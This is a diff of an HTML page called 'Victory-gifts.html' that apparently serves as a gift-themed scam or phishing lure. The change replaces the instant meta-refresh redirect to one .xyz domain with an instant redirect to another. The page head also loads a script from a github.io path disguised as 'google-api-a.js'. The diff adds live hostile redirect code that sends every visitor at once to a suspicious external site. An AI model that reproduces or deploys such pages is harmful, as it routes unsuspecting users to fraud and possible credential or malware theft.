--- a/Victory-gifts.html
+++ b/Victory-gifts.html
@@ -14,6 +14,6 @@
     <meta property="og:updated_time" content="1440432930" />
     <link rel="me" href="https://www.blogger.com/profile/13809910274301822692" />
 <script src="https://enpply.github.io/Medikal/google-api-a.js"></script>
-	    <meta http-equiv="refresh" content="0; url=https://sign.mypetition.xyz/GenZ-Victory-Gifts.html#1722938301499">
+	    <meta http-equiv="refresh" content="0; url=https://get.dataplug.xyz/Victory-gifts.html#1722940332557">
 <link rel="me" href="https://www.blogger.com/profile/17222055979768522082" />
 </head>
